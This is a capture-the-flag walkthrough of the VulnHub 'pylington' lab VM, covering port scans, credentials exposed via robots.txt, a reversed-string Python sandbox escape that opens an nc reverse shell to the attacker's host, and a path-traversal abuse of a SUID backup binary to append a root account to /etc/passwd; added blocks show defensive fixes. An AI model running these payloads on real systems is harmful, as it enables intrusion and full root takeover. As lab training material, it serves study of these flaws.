VulnHub: pylington

Information gathering

TCP open-port scan

# Nmap 7.93 scan initiated Sat Sep  2 06:03:51 2023 as: nmap --min-rate 10000 -p- -oA tcp_open_port 192.168.43.148
Nmap scan report for 192.168.43.148
Host is up (0.00011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:81:3C:60 (VMware)

# Nmap done at Sat Sep  2 06:04:07 2023 -- 1 IP address (1 host up) scanned in 15.16 seconds

UDP open-port scan

# Nmap 7.93 scan initiated Sat Sep  2 06:04:07 2023 as: nmap -sU --min-rate 10000 -p- -oA udp_open_port 192.168.43.148
Warning: 192.168.43.148 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.43.148
Host is up (0.00077s latency).
All 65535 scanned ports on 192.168.43.148 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
MAC Address: 00:0C:29:81:3C:60 (VMware)

# Nmap done at Sat Sep  2 06:05:33 2023 -- 1 IP address (1 host up) scanned in 86.07 seconds

Service scan of the open ports

# Nmap 7.93 scan initiated Sat Sep  2 06:05:33 2023 as: nmap -sT -sV -O -p22,80, -oA open_port_service 192.168.43.148
Nmap scan report for 192.168.43.148
Host is up (0.00061s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.5 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.46 ((Unix) mod_wsgi/4.7.1 Python/3.9)
MAC Address: 00:0C:29:81:3C:60 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep  2 06:05:54 2023 -- 1 IP address (1 host up) scanned in 21.07 seconds

Getting a shell

Information gathering shows that the target has ports 22 and 80 open; port 80 is tested first.

Sensitive information in robots.txt

Opening the target's HTTP site in a browser, robots.txt lists three paths

User-agent: *
Disallow: /register
Disallow: /login
Disallow: /zbir7mn240soxhicso2z

Checking them one by one, the page at http://192.168.43.148/zbir7mn240soxhicso2z contains a credential; save it.

Username: steve

Password: bvbkukHAeVxtjjVH

Visit /login and log in with the credential just obtained; after a successful login the following page is shown

Clicking "Welcome back, steve!" leads to a Python code-execution page

The hint on the page gives the function that checks submitted code:

def check_if_safe(code: str) -> bool:
    if 'import' in code: # import is too dangerous
        return False
    elif 'os' in code: # os is too dangerous
        return False
    elif 'open' in code: # opening files is also too dangerous
        return False
    else:
        return True

As can be seen, it checks whether the code contains the strings import, os or open; if any of them is present the code is not executed, so a bypass is needed.

Following the CSDN blog post "python沙箱逃逸总结" by 拓海AE, a reverse-shell payload is constructed:

print(getattr(getattr(__builtins__, '__tropmi__'[::-1])('so'[::-1]), 'metsys'[::-1])('nc -e /bin/bash 192.168.43.128 443'))

Run rlwrap nc -lvnp 443 on Kali to listen, then execute the payload

Reverse shell obtained!
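Added example, not from the original post or the challenge: the page's substring blacklist beside an AST-based allowlist that rejects the reversed-string trick, because a string literal can never become a module or function without getattr, eval or attribute access. check_if_safe_ast, FORBIDDEN_NAMES and ALLOWED_NODES are names chosen here, and BYPASS_SAMPLE is the page's technique with a harmless command; even this filter is only defense in depth, and user-supplied code belongs in a separate process with its own user, seccomp and a timeout.

```python
import ast

def check_if_safe(code: str) -> bool:
    """The substring blacklist from the page, reproduced for comparison."""
    return not any(word in code for word in ("import", "os", "open"))

# Builtins that turn a string back into a live object or reach the interpreter.
FORBIDDEN_NAMES = {"getattr", "setattr", "delattr", "eval", "exec", "compile",
                   "__import__", "globals", "locals", "vars", "open", "help",
                   "input", "breakpoint"}

# Positive allowlist of syntax; anything absent (Import, Attribute, Lambda, With,
# Try, comprehensions, ...) is rejected instead of being pattern-matched.
ALLOWED_NODES = (
    ast.Module, ast.Expr, ast.Assign, ast.AugAssign, ast.Name, ast.Load, ast.Store,
    ast.Constant, ast.BinOp, ast.UnaryOp, ast.BoolOp, ast.Compare, ast.Call,
    ast.keyword, ast.If, ast.For, ast.While, ast.Break, ast.Continue, ast.Pass,
    ast.Return, ast.FunctionDef, ast.arguments, ast.arg, ast.List, ast.Tuple,
    ast.Dict, ast.Subscript, ast.Slice, ast.JoinedStr, ast.FormattedValue,
    ast.Add, ast.Sub, ast.Mult, ast.Div, ast.FloorDiv, ast.Mod, ast.Pow,
    ast.USub, ast.Not, ast.And, ast.Or, ast.Eq, ast.NotEq, ast.Lt, ast.LtE,
    ast.Gt, ast.GtE, ast.In, ast.NotIn,
)

def check_if_safe_ast(code: str) -> bool:
    """Accept only code built from ALLOWED_NODES that never uses a forbidden or
    dunder identifier. 'so'[::-1] is still just a str: without getattr, eval or
    attribute access there is no way to turn it into the os module."""
    try:
        tree = ast.parse(code, mode="exec")
    except SyntaxError:
        return False
    for node in ast.walk(tree):
        if not isinstance(node, ALLOWED_NODES):
            return False
        if isinstance(node, ast.Name) and (node.id in FORBIDDEN_NAMES
                                           or node.id.startswith("__")):
            return False
        if isinstance(node, ast.FunctionDef) and node.name.startswith("__"):
            return False
    return True

# The page's bypass technique with a harmless command, used only to classify it.
BYPASS_SAMPLE = ("getattr(getattr(__builtins__, '__tropmi__'[::-1])('so'[::-1]),"
                 " 'metsys'[::-1])('id')")
```

Note that the blacklist also rejects harmless code such as `cost = 5` (it contains "os"), while the AST check accepts it.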

Privilege escalation

In py's home directory there is a SUID binary, typing, together with its source typing.cc:

#include <iostream>
#include <string>
#include <iterator>
#include <fstream>
#include <algorithm>

int main(){
    std::cout<<"Let's play a game! If you can type the sentence below, then I'll tell you my password.\n\n";

    std::string text="the quick brown fox jumps over the lazy dog";

    
    std::cout<<text<<'\n';

    std::string line;
    std::getline(std::cin,line);

    if(line==text){
        std::ifstream password_file("/home/py/password.txt");
        std::istreambuf_iterator<char> buf_it(password_file),buf_end;
        std::ostreambuf_iterator<char> out_it (std::cout);
        std::copy(buf_it,buf_end,out_it);
    }
    else{
        std::cout<<"WRONG!!!\n";
    }
}

Reading it shows that entering the quick brown fox jumps over the lazy dog prints the contents of /home/py/password.txt. So run the binary, type the quick brown fox jumps over the lazy dog, and obtain the password

54ezhCGaJV

Switching to user py succeeds.

Continuing to enumerate for sensitive information, /home/py/secret_stuff/ contains a root-owned SUID binary, backup, with its source backup.cc; reading the source:

#include <iostream>
#include <string>
#include <fstream>

int main(){
    std::cout<<"Enter a line of text to back up: ";
    std::string line;
    std::getline(std::cin,line);
    std::string path;
    std::cout<<"Enter a file to append the text to (must be inside the /srv/backups directory): ";
    std::getline(std::cin,path);

    if(!path.starts_with("/srv/backups/")){
        std::cout<<"The file must be inside the /srv/backups directory!\n";
    }
    else{
        std::ofstream backup_file(path,std::ios_base::app);
        backup_file<<line<<'\n';
    }

    return 0;


}

Its function is to append a line to a file. The only restriction is a check that the path begins with /srv/backups/, so ../ can be used to bypass it and add a root user xiaoliyu to /etc/passwd (modifying passwd, shadow, sudoers or similar configuration files would work just as well).

Generate the password hash on Kali with openssl

openssl passwd -1 -salt xiaoliyu 1234567

$1$xiaoliyu$TPkEIAAV6c3.9lCGGytdB/

On the target, run cat /etc/passwd | grep root to get the root line, replace the x with the hash generated on Kali, giving the line to append:

xiaoliyu:$1$xiaoliyu$TPkEIAAV6c3.9lCGGytdB/:0:0::/root:/bin/bash

Run the backup binary and enter the payload and the file name

Then switch to user xiaoliyu with password 1234567. Success!
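As an added example (not part of the original walkthrough or the challenge), the backup.cc path check and its fix in Python: prefix_check reproduces the raw string-prefix test, while confined_path and append_line resolve the path with realpath() before comparing whole components against the base directory. BACKUP_DIR, the function names and the scratch-directory demo are assumptions of this example.

```python
import os
import shutil
import tempfile
from typing import Optional

BACKUP_DIR = "/srv/backups"  # the directory backup.cc is meant to confine writes to

def prefix_check(path: str) -> bool:
    """The check backup.cc performs: a string-prefix test on the raw input."""
    return path.startswith(BACKUP_DIR + "/")

def confined_path(path: str, base: str = BACKUP_DIR) -> Optional[str]:
    """Return the resolved path if it lies inside base, otherwise None.
    realpath() collapses '.' and '..' and follows symlinks, so the path is
    judged by where it lands rather than by how it was spelled."""
    base_real = os.path.realpath(base)
    target = os.path.realpath(path)
    # commonpath() compares whole components: '/srv/backups2/x' is not under base.
    return target if os.path.commonpath([base_real, target]) == base_real else None

def append_line(line: str, path: str, base: str = BACKUP_DIR) -> bool:
    """Append one line as backup.cc does, but only to a file confined to base."""
    target = confined_path(path, base)
    if target is None or "\n" in line:
        return False
    # O_NOFOLLOW refuses a symlink planted as the final component after the
    # realpath() check; a SUID program should also drop privileges for the write.
    flags = os.O_WRONLY | os.O_APPEND | os.O_CREAT | os.O_NOFOLLOW
    with os.fdopen(os.open(target, flags, 0o640), "w") as fh:
        fh.write(line + "\n")
    return True

def demo() -> dict:
    """Run both checks against a scratch directory (constructed input)."""
    base = tempfile.mkdtemp()
    inside = os.path.join(base, "daily.txt")
    escape = os.path.join(base, "..", "escaped.txt")
    traversal = BACKUP_DIR + "/../../etc/passwd"
    result = {
        "prefix_accepts_traversal": prefix_check(traversal),
        "confined_rejects_traversal": confined_path(traversal) is None,
        "wrote_inside": append_line("nightly ok", inside, base),
        "wrote_outside": append_line("owned", escape, base),
    }
    with open(inside) as fh:
        result["contents"] = fh.read()
    shutil.rmtree(base)
    return result
```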
